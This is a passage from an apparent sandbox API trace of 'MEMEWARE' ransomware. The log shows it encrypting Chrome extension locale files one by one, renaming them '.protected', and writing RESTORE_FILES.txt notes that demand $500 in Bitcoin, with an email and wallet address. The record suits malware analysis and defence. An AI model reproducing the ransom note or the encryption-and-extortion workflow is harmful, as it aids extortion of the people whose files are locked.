[0079.852] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.852] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.852] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json") returned 157 [0079.852] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.852] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.852] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.852] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.853] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json") returned 157 [0079.853] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.853] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json") returned 157 [0079.853] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.853] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json") returned 157 [0079.853] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.853] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.854] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.854] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.854] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.854] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.854] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.854] CloseHandle (hObject=0x168) returned 1 [0079.855] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.protected") returned 167 [0079.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.protected")) returned 1 [0079.855] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.855] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.855] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\RESTORE_FILES.txt") returned 161 [0079.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.856] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.856] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.856] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.856] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.857] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.857] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.857] CloseHandle (hObject=0x164) returned 1 [0079.857] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.857] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0079.857] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0079.857] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") returned 1 [0079.857] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0079.857] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0079.857] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru") returned 143 [0079.857] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0079.857] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0079.857] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\*") returned 145 [0079.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.857] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.857] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.858] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.858] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.858] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.858] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\.") returned 145 [0079.858] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.858] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.858] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.858] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.858] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 
[0079.858] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.858] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.858] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\..") returned 146 [0079.858] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.858] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.858] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.858] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.858] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.858] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.858] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.858] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.858] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json") returned 157 [0079.858] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.858] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.858] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.858] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json") returned 157 [0079.859] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json") returned 157 [0079.859] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json") returned 157 [0079.859] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.859] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.860] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.860] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 
1 [0079.860] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.860] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.860] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.861] CloseHandle (hObject=0x168) returned 1 [0079.861] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.protected") returned 167 [0079.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.protected")) returned 1 [0079.861] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.861] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.861] wnsprintfW (in: 
pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\RESTORE_FILES.txt") returned 161 [0079.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.862] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.862] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.863] lstrlenA (lpString="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") returned 684 [0079.863] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.863] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.863] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.863] CloseHandle (hObject=0x164) returned 1 [0079.863] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.863] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0079.863] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0079.863] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0079.863] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0079.863] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0079.863] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk") returned 143 [0079.863] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0079.863] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0079.864] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\*") returned 145 [0079.864] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.864] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.864] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.864] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.865] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.865] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.865] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\.") returned 145 [0079.865] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.865] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.865] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.865] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.865] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.865] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.865] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.865] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\..") returned 146 [0079.865] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.865] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.865] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.865] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.865] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.865] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.865] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.865] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.865] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json") returned 157 [0079.865] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.865] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.865] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.865] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 